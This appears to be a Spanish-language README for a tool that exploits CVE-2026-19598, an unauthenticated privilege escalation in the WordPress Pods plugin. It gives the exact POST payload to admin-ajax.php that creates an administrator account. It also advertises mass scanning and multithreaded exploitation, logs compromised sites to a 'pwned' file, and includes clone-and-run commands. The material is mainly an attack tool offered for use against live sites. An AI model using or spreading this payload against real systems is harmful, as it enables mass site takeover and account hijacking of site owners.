
Explota la CVE-2026-19598 en el plugin Pods de WordPress para crear cuentas de administrador o sobrescribir contraseñas mediante una solicitud AJAX no autenticada, con soporte de escaneo masivo y multi-hilo.
Escalada de Privilegios No Autenticada Crítica (CVSS 9.8) — Plugin Pods de WordPress ≤ 3.3.9
Esta herramienta explota CVE-2026-19598, una vulnerabilidad en el plugin Pods de WordPress que permite a atacantes no autenticados crear nuevas cuentas de administrador o sobrescribir contraseñas de usuarios existentes a través del endpoint admin-ajax.php.
| Propiedad | Valor |
|---|---|
| ID CVE | CVE-2026-19598 |
| Puntuación CVSS | 9.8 (Crítica) |
| CWE | CWE-284 — Control de Acceso Inadecuado |
| Producto Afectado | Plugin Pods de WordPress ≤ 3.3.9 |
| Versión Parcheada | 3.3.9.1 |
| Autenticación Requerida | NO (no autenticado) |
| Estado | Explotación Activa |
La vulnerabilidad existe en la acción AJAX pods_admin. Debido a comprobaciones de permisos inadecuadas, el método save_user puede ser invocado sin autenticación cuando el parámetro meta-box-loader está presente. Esto permite a un atacante:
POST /wp-admin/admin-ajax.php action=pods_admin method=save_user meta-box-loader=1 user_login=evil_admin user_pass=Hacked123! role=administrator
El plugin no verifica que el usuario que realiza la solicitud tenga las capacidades adecuadas, y el parámetro meta-box-loader omite las comprobaciones de seguridad previstas.
pods_pwned.txt con todos los objetivos explotadosrequests# Clonar el repositorio
git clone https://github.com/0xCyp1337/CVE-2026-19598.git
cd CVE-2026-19598
python3 CVE-2026-19598.py
# Instalar dependencias (solo se necesita requests)
pip install requests